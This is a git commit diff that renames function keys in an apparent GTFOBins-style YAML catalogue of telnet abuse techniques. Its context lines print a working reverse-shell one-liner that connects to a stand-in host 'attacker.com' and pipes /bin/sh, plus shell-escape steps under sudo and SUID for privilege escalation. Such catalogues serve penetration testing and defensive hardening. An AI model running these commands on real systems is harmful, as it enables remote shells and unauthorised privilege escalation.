Adopt new function names

This commit is contained in:
Emilio Pinna
2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions

View File

@@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@@ -8,14 +8,14 @@ functions:
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
sudo:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@@ -23,7 +23,7 @@ functions:
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
limited-suid:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com